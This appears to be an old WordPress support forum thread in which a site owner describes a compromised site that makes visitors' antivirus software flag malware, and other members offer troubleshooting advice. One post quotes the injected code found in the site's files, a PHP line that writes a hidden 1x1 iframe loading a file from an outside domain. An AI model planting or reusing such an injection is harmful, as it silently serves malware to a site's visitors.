WordPress.org

Ready to get started?Download WordPress

Forums

wordpress installing spyware?! (10 posts)

  1. LuthienMoss
    Member
    Posted 6 years ago #

    My site is acting all strange trying to install shit on my computer! When I google my site they say:

    This site may harm your computer.
    Parse error: syntax error, unexpected '<' in /home/wordpress/wp-content/plugins/ajax-referer-fix/ajax-referer-fix.php on line ... Note that in some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message

    I am getting errors and it seems like they are coming from wordpress. What can I do to fix this?! It seems like my computer and my site's visitors' computer has been infected with some malicious code, and I can't even fix it!

    I dunno if this is relevant but some weeks ago I installed a LOT of plugins (10-15 plugins). It may be those? How can I locate from where the ugly code comes from, so I can delete the file?

    I am now trying to delete my wordpress but ti takes me agefs since I have to go through every single folder and delete the files manually. Sometimes my FTP crashes and I have to start all over agian, this (crashing/freezing) havent happened before.

  2. moshu
    Member
    Posted 6 years ago #

    I am getting errors and it seems like they are coming from wordpress.

    From WP? Can you read?
    plugins/ajax-referer-fix/

    That's NOT wordpress. It's you. You installed that plugin, WP doesn't come with it.

  3. LuthienMoss
    Member
    Posted 6 years ago #

    From WP? Can you read?

    No, I'm having my mum writing this post for me.

    You don't have to be rude.

    I dunno if this is relevant but some weeks ago I installed a LOT of plugins (10-15 plugins). It may be those?

    I deleted the whole wordpress folder but I am still getting the error. I'm really confused

  4. flsunshine
    Member
    Posted 6 years ago #

    If you are still getting the error then you might have spyware on your computer system. Try using SpyBot--Search and Destroy or Lavasoft Ad-ware to see if it’s on your computer. If it's clean then run Highjack This and post it to the Highjack forum and they will tell you what's wrong. It has something to do with Ajax.

  5. Roy
    Member
    Posted 6 years ago #

    I deleted the whole wordpress folder but I am still getting the error.

    From where? Your server? I think your site may have been hacked or at least "spammed".

  6. LuthienMoss
    Member
    Posted 6 years ago #

    From the very beginning when I first entered my site I was greeted by a blank white page with the above quoted error (ajax). I also got numerous of popups in the bottom right corner by my comp/anti-virus stating a virus has been deleted from my computer, the moment I entered the site. [[http://img187.imageshack.us/img187/4590/viruaj9.jpg]] Since this popup never appeared during browsing of other sites, I assumed something must be wrong with MY site. Since I, in addition was getting the ajax error, I assumed it was a wordpress plugin problem, deleted the ajax folder through my FTP (since I couldn't access my site/wordpress blog by using a browser) After deleting the plugin I was still having problems, and my site was still trying to install that virus on my computer.

    So I proceeded, deleting ALL plugins. No change. I did a search on the forum and saw people had had some similar problems, so I skimmed through a few wordpress files, like recommended previously in other threads, such as the themes and index file, and sure, I saw some malicious coding had been inserted in those files, I have NO idea how it got there. The unfamiliar code looks like this:
    <?php echo '<iframe src="http://cdpuvbhfzz.com/dl/adv598.php" width=1 height=1></iframe>'; ?>

    I still suspect is has SOMETHING to do with the plugins, I don't know WHICH plugin since I recently, a couple of weeks ago, installed about 10 or 15 new plugins.

    I was frustrated, feeling stressed, and deleted the complete wordpress folder, thought 'problem solved'. I was wrong. After deleting my wordpress folder, I was STILL gettin the darn warning/notice about a virus being blocked. Meaning my site is still infected. So I deleted my XMB forum. Or any script I thought could be causing the virus. Now I try to use as few scripts as possible because I know there is always a security risk. After deleting both wordpress and xmb, I was still getting the virus warning. I use a script called "Skinner", I've used it for years and never experienced problems with it before, but now, skimming through some Skinner files, I see that darn code again! It's all over the place! So I delete the files, uploaded the original files ... and that's where I am standing right now. I still get the virus warning ... so I need to delete my site and upload fresh files.

    What the HECK is going on?!

    In the future, how can I locate the source instead of just deleting the whole script? How can I know which plugins are safe and which arent? How the heck could someone insert code in my files?! I really don't understand this.

    UPDATE: looks like the ugly coding has been added to ALL my pages, even the ones that aren't related to any scripts! I use regular HTML and some php, to include a header and footer. This is queer. Okay so now I know how to get rid of it, but I want to know how it got there in the first place.

  7. LuthienMoss
    Member
    Posted 6 years ago #

    I just noticed several other sites having the same issue.

    one of those sites is
    http://www.monicabelluccifan.com/

  8. DianeV
    Member
    Posted 6 years ago #

    I don't see anything like that on that site, LuthienMoss. In fact, the page contains just an image, with a link to a fansite. ??

  9. whooami
    Member
    Posted 6 years ago #

    yeap, thats all I see. :) But then .. well, you know.

  10. DianeV
    Member
    Posted 6 years ago #

    Yes, I know what you mean. I think. <grin>

Topic Closed

This topic has been closed to new replies.

About this Topic